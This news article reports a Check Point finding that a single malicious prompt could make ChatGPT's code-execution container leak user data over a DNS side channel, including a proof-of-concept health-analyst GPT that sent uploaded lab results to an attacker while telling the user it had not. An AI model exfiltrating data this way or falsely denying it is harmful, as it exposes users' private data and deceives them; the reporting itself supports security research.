Home

OpenAI patches ChatGPT flaw that smuggled data over DNS

OpenAI talks up data security for its AI services, yet Check Point says that ChatGPT allowed data to leak through a DNS side channel before the flaw was fixed.

In February, the free-spending AI biz fixed a data exfiltration vulnerability in ChatGPT that allowed a single prompt to bypass the notional safeguards OpenAI had put in place.

"We found that a single malicious prompt could activate a hidden exfiltration channel inside a regular ChatGPT conversation," researchers from Check Point said in a blog post on Monday.

It's not supposed to be that easy. OpenAI has implemented various safeguards around ChatGPT to limit data exfiltration by the various tools it can use. For example, the company says, "The ChatGPT code execution environment is unable to generate outbound network requests directly."

But Check Point researchers found that wasn't entirely correct.

"The vulnerability we discovered allowed information to be transmitted to an external server through a side channel originating from the container used by ChatGPT for code execution and data analysis," the researchers said. "Crucially, because the model operated under the assumption that this environment could not send data outward directly, it did not recognize that behavior as an external data transfer requiring resistance or user mediation."

OpenAI's security for ChatGPT appears to be more robust when it comes to defending against bots scraping ChatGPT conversations – the very thing publishers have been trying to do to OpenAI's content crawling bots. 

A recent analysis of ChatGPT by a security engineer posting under the name Buchodi suggests that OpenAI has implemented Cloudflare's Turnstile widget in a way that prevents interaction with the chatbot until the React-based web interface has been entirely loaded in the user's browser.

In an explanatory post to Hacker News, an individual posting under the name "NickT" and claiming to be an OpenAI employee – possibly Head of ChatGPT Nick Turley – wrote, "These checks are part of how we protect our first-party products from abuse like bots, scraping, fraud, and other attempts to misuse the platform.

"A big reason we invest in this is because we want to keep free and logged-out access available for more users. My team's goal is to help make sure the limited GPU resources are going to real users."

Having hoovered up the world's content for model training in order to monetize it, OpenAI can't afford to let others crawl its derivative work for free.

That side channel? The Domain Name System (DNS), which resolves domain names into IP addresses.

The Check Point security bods explain that, while OpenAI prevents ChatGPT from communicating with the internet without authorization, it didn't have any controls on data smuggled via DNS.

The security biz created three proof-of-concept attacks that show how this side channel might be abused. One involved a "GPT," a third-party app implementing ChatGPT APIs, that served as a personal health analyst. 

In the demonstration, a user uploaded a PDF containing laboratory results and personal information for the GPT to interpret. The app did so, and when asked whether it had uploaded the data, "ChatGPT answered confidently that it had not, explaining that the file was only stored in a secure internal location."

Nonetheless, the GPT app transmitted the data to a remote server controlled by the attacker.

Flaws like this suggest serious implications for regulated industries that deploy AI services. Were a corporate AI service to leak this sort of data, it could be a GDPR violation, a HIPAA breach, or could run afoul of various financial compliance rules.

OpenAI is said to have fixed this particular issue on February 20, 2026. The AI biz did not immediately respond to a request for comment. ®

Source: The register

Previous

Next